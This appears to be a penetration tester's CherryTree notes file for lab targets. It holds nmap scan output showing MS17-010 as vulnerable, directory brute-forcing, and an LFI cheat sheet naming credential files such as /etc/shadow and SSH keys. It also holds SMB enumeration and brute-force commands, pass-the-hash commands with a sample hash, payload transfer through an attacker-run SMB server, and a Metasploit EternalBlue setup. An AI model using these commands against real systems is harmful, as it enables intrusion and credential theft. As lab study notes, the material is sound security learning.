<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="Kioptrix" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565077.42" ts_lastsave="1587565077.42" unique_id="38">
		<rich_text></rich_text>
		<node custom_icon_id="10" foreground="" is_bold="True" name="10.10.223.62" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590578791.76" unique_id="39">
			<rich_text></rich_text>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Setup" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568434.39" ts_lastsave="1587568440.66" unique_id="83">
				<rich_text></rich_text>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Alias" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568479.92" ts_lastsave="1590145568.24" unique_id="84">
					<rich_text>export target=10.10.255.95
printenv
*
---
gedit /etc/hosts
add:
192.168.16.129 target</rich_text>
				</node>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949452.72" unique_id="40">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="TCP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949819.41" ts_lastsave="1587583334.51" unique_id="41">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Ping Scan (Quick Sweep)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566370.19" ts_lastsave="1590578674.64" unique_id="80">
						<rich_text>doesn't ping</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service &amp; OS Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565364.18" ts_lastsave="1590578875.09" unique_id="76">
						<rich_text>nmap -A target
(-O for just OS, -sV for just service)
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-27 07:24 EDT            
Nmap scan report for 10.10.223.62                                          
Host is up (0.20s latency).                                                
Not shown: 991 closed ports                                                
PORT      STATE SERVICE            VERSION                                 
135/tcp   open  msrpc              Microsoft Windows RPC                   
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn           
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)                                        
3389/tcp  open  ssl/ms-wbt-server?                                         
|_ssl-date: 2020-05-27T11:26:22+00:00; 0s from scanner time.               
49152/tcp open  msrpc              Microsoft Windows RPC                   
49153/tcp open  msrpc              Microsoft Windows RPC                   
49154/tcp open  msrpc              Microsoft Windows RPC                   
49158/tcp open  msrpc              Microsoft Windows RPC                   
49159/tcp open  msrpc              Microsoft Windows RPC                   
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows     
                                                                           
Host script results:                                                       
|_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: 0s              
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 02:e1:fb:3b:d8:b6 (unknown)                                                        
| smb-os-discovery:                                                        
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-05-27T06:26:16-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-27T11:26:15
|_  start_date: 2020-05-27T11:23:22

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 147.41 seconds
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Full Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565540.94" ts_lastsave="1590148800.04" unique_id="79">
						<rich_text>nmap -p- -sV -sS -T4 target
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-22 07:20 EDT
Nmap scan report for 10.10.255.95
Host is up (0.21s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 498.13 seconds
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service Banners" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565457.83" ts_lastsave="1590146267.98" unique_id="78">
						<rich_text>nmap -sV 10.10.255.95
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-22 07:16 EDT
Nmap scan report for 10.10.255.95
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 35.79 seconds
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Reconnoitre" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583334.51" ts_lastsave="1587583348.93" unique_id="89">
						<rich_text link="webs https://github.com/codingo/Reconnoitre" scale="h3">Reconnoitre</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<codebox char_offset="12" frame_height="269" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"># Scan a single host, create file structure &amp; discover services
python reconnoitre.py -t 192.168.1.5 -o /root/Documents/labs/ --services

# Discover live hosts &amp; hostnames within a range
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --hostnames
    
# Discover live hosts within a range and then do a quick probe for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services --quick    
    
# Discover live hosts w/in a range &amp; probe all ports (tcp &amp; udp) for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services</codebox>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Vuln Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565374.96" ts_lastsave="1590579363.98" unique_id="77">
						<rich_text>nmap -Pn --script vuln,nmap-vulners,vulscan target
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-27 07:30 EDT
Nmap scan report for 10.10.223.62
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       </rich_text>
						<rich_text link="webs http://technet.microsoft.com/en-us/security/bulletin/ms12-020">http://technet.microsoft.com/en-us/security/bulletin/ms12-020</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152</rich_text>
						<rich_text>
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs http://technet.microsoft.com/en-us/security/bulletin/ms12-020">http://technet.microsoft.com/en-us/security/bulletin/ms12-020</rich_text>
						<rich_text>
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
49152/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49159/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       </rich_text>
						<rich_text link="webs https://technet.microsoft.com/en-us/library/security/ms17-010.aspx">https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/">https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</rich_text>
						<rich_text>

Nmap done: 1 IP address (1 host up) scanned in 120.92 seconds
</rich_text>
					</node>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="UDP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949826.2" ts_lastsave="1587566901.16" unique_id="42">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="UDP Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566901.16" ts_lastsave="1590155072.91" unique_id="81">
						<rich_text>nmap -sU target
---
[sudo] password for user: 
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-22 08:00 EDT
Stats: 0:07:21 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 46.55% done; ETC: 08:16 (0:08:28 remaining)
Nmap scan report for 10.10.255.95
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm

Nmap done: 1 IP address (1 host up) scanned in 1000.95 seconds
</rich_text>
					</node>
				</node>
				<node custom_icon_id="17" foreground="" is_bold="False" name="Web Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590146587.26" unique_id="43">
					<rich_text></rich_text>
					<node custom_icon_id="18" foreground="" is_bold="False" name="WhatWeb (profile)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473692.93" ts_lastsave="1590146551.11" unique_id="46">
						<rich_text>whatweb target
---
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Nikto" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949545.74" ts_lastsave="1590146547.8" unique_id="44">
						<rich_text>nikto -h target -p 80,443
---
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Dirb\DirBuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949554.24" ts_lastsave="1590146539.54" unique_id="45">
						<rich_text>dirb -r </rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text> /usr/share/dirb/wordlists/big.txt
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="gobuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590146587.26" ts_lastsave="1590149358.21" unique_id="91">
						<rich_text>gobuster dir -u </rich_text>
						<rich_text link="webs http://&lt;ip&gt;:3333">http://target:3333</rich_text>
						<rich_text> -w /usr/share/dirb/wordlists/big.txt
gobuster dir -u </rich_text>
						<rich_text link="webs http://10.10.255.95:3333">http://10.10.255.95:3333</rich_text>
						<rich_text> -w dirbuster/directory-list-2.3-medium.txt
/usr/share/wordlists has many lists
---
GoBuster flag	Description
-e	Print the full URLs in your console
-u	The target URL
-w	Path to your wordlist
-U and -P	Username and Password for Basic Auth
-p &lt;x&gt;	Proxy to use for requests
-c &lt;http cookies&gt;	Specify a cookie for simulating your auth
---
user@kalisi:/usr/share/wordlists$ gobuster dir -u </rich_text>
						<rich_text link="webs http://10.10.255.95:3333">http://10.10.255.95:3333</rich_text>
						<rich_text> -w dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            </rich_text>
						<rich_text link="webs http://10.10.255.95:3333">http://10.10.255.95:3333</rich_text>
						<rich_text>
[+] Threads:        10
[+] Wordlist:       dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/22 08:08:50 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)

*internal has a file upload feature</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="LFI" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583115.16" ts_lastsave="1587584029.69" unique_id="88">
						<rich_text link="webs https://evi1us3r.wordpress.com/lfi-cheat-sheet/">https://evi1us3r.wordpress.com/lfi-cheat-sheet/</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://highon.coffee/blog/lfi-cheat-sheet/">https://highon.coffee/blog/lfi-cheat-sheet/</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</rich_text>
						<rich_text>

LFI Cheat Sheet  
</rich_text>
						<rich_text weight="heavy">Useful LFI files</rich_text>
						<rich_text>
../../../../../etc/passwd%00
 
</rich_text>
						<rich_text weight="heavy">Linux:</rich_text>
						<rich_text>
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
 
</rich_text>
						<rich_text weight="heavy">Apache:</rich_text>
						<rich_text>
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
 
</rich_text>
						<rich_text weight="heavy">Log</rich_text>
						<rich_text> </rich_text>
						<rich_text weight="heavy">Files</rich_text>
						<rich_text>:
Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log
Debian/Ubuntu-   /var/log/apache2/access.log
FreeBSD-   /var/log/httpd-access.log
 
</rich_text>
						<rich_text weight="heavy">Generic</rich_text>
						<rich_text>:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
 
</rich_text>
						<rich_text weight="heavy">MySql:</rich_text>
						<rich_text>
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
 
</rich_text>
						<rich_text weight="heavy">Windows:</rich_text>
						<rich_text>
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml

  Local File Inclusion/Remote File Inclusion (LFI/RFI) 
•  </rich_text>
						<rich_text link="webs http://www.grobinson.me/single-line-php-script-to-gain-shell/">http://www.grobinson.me/single-line-php-script-to-gain-shell/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://webshell.co/">https://webshell.co/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://osandamalith.com/2015/03/29/lfi-freak/">https://osandamalith.com/2015/03/29/lfi-freak/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29">https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/">https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://attackerkb.com/Windows/blind_files">https://attackerkb.com/Windows/blind_files</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://digi.ninja/blog/when_all_you_can_do_is_read.php">https://digi.ninja/blog/when_all_you_can_do_is_read.php</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/">https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/">https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt">https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html">http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/">https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt">https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt</rich_text>
						<rich_text> </rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Aqutone (for reporting)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587584029.69" ts_lastsave="1587584050.27" unique_id="90">
						<rich_text></rich_text>
					</node>
				</node>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Other Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587570784.47" unique_id="48">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SMB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473455.56" ts_lastsave="1590579886.53" unique_id="49">
						<rich_text link="webs https://highon.coffee/blog/enum4linux-cheat-sheet/">https://highon.coffee/blog/enum4linux-cheat-sheet/</rich_text>
						<rich_text>

mount -t cifs &quot;//10.11.1.49/admin$&quot; /mnt/windows/ -o username=bethany\alice,domain=workgroup,password=loading1 --verbose

</rich_text>
						<rich_text scale="h2">SMB Enum</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Fingerprint SMB version</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Find open SMB Shares</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Enumerate SMB Users</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">SMB Server</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Pass the hash</rich_text>
						<rich_text>
</rich_text>
						<rich_text weight="heavy">SMB</rich_text>
						<rich_text>
In order to use pass the hash, we first need to put the hash in a env variable using the export command:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

So we will atuhenticate against a smb-service.
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

I think you can run it like this too:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text weight="heavy">Remote Desktop</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Exploits</rich_text>
						<rich_text>
EternalBlue (MS17-010)
</rich_text>
						<codebox char_offset="183" frame_height="1034" frame_width="700" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmblookup -A 10.1.1.1

smbclient //MOUNT/share -I 10.1.1.1 -N
# connect to share, -N no password prompt

smbclient -L \\10.11.1.1 -U bob -S off
rpcclient -p 139 -U &quot;bob&quot; -S off 10.11.1.1
# disable message signing

rpcclient -U &quot;&quot; 10.1.1.1
# works on older windows versions

enum4linux 10.1.1.1
# discover Windows/Samba servers on subnet, finds Windows MAC addresses, netbios name &amp; discover client workgroup/domain

nbtscan 10.1.1.0/24
# do everything, runs all options apart from dictionary based share name guessing

enum4linux -a 10.1.1.1
# performs all basic enumeration using smb null session

enum4linux -U 192.168.1.2   
#-You will get userlist
# SMB null session is an unauthenticated netbios session between two computers.
# SMB null session is available for SMB1 systems only i.e 2000,xp,2003

#To use an smb null session :
rpcclient -U &quot;&quot; 192.168.1.2
#when asked enter empty password
rpcclient $&gt;srvinfo
rpcclient $&gt;enumdomusers
rpcclient $&gt;querydominfo
rpcclient $&gt;getdompwinfo
#password policy
rpcclient $&gt;netshareenum
nmblookup -A 192.168.1.1
rpcinfo -p &lt;target&gt;

#Enumerate using smbclinet:
smbclient -L //192.168.1.2
smbclient -L //192.168.1.2/myshare -U anonymous

smb&gt; get data.txt
smb&gt;put evil.txt

#Brute SMB password:
nmap -p445 --script=smb-brute.nse &lt;ip&gt;

# Brute force should always be your last option. 
# You can also use hydra to do it.

#Using nmap:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.1.200-254

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

nmap -sSU -script smb-os-discovery.nse -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbos -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-vuln\* -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbvuln -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-enum\* -p U:137,T:139,445 --script-args=smbuser=username,smbpass=password -oA 10.11.1.5_smbenum -vv -n -Pn 10.11.1.5</codebox>
						<codebox char_offset="210" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"></codebox>
						<codebox char_offset="234" frame_height="119" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap -oA 192.168.1.0_shares --script=smb-enum-shares --script-args=smbuser=username,smbpass=password -p445 192.168.1.0/24   
# possible techniques - specify no creds, empty creds, correct creds and incorrect creds

smbclient -L //192.168.1.100 -N
#list shares with no password prompt</codebox>
						<codebox char_offset="257" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap --script=smb-enum-users -sSU -pU:137,T:139 -oA 192.168.1.200-254_smbusers 192.168.11.200-254 </codebox>
						<codebox char_offset="271" frame_height="125" frame_width="545" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">python /usr/share/doc/python-impacket/examples/smbserver.py probfine ./

#Get
copy \\10.1.1.1\probfine\payload .

#Put
copy C:\coolinfo \\10.1.1.1\probfine\</codebox>
						<codebox char_offset="397" frame_height="35" frame_width="590" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896</codebox>
						<codebox char_offset="447" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U administrator //192.168.1.101 cmd</codebox>
						<codebox char_offset="488" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U admin/hash:has //192.168.0.101 cmd</codebox>
						<codebox char_offset="506" frame_height="80" frame_width="455" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">apt-get update
apt-get install freerdp-x11

xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101</codebox>
						<node custom_icon_id="0" foreground="" is_bold="False" name="enum4linux" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587571038.1" ts_lastsave="1590602741.72" unique_id="87">
							<rich_text>enum4linux -v target
---
</rich_text>
						</node>
						<node custom_icon_id="0" foreground="" is_bold="False" name="MetaSploit MS17-010" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590579886.53" ts_lastsave="1590603796.99" unique_id="92">
							<rich_text>msfconsole
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.223.62

</rich_text>
						</node>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SNMP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473619.73" ts_lastsave="1587570434.53" unique_id="50">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="DB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473622.74" ts_lastsave="1500473677.59" unique_id="51">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473623.25" ts_lastsave="1500473681.55" unique_id="52">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="RPC" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587570784.47" ts_lastsave="1587570796.27" unique_id="85">
						<rich_text></rich_text>
					</node>
				</node>
			</node>
			<node custom_icon_id="22" foreground="" is_bold="False" name="Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590155993.88" unique_id="53">
				<rich_text link="webs https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</rich_text>
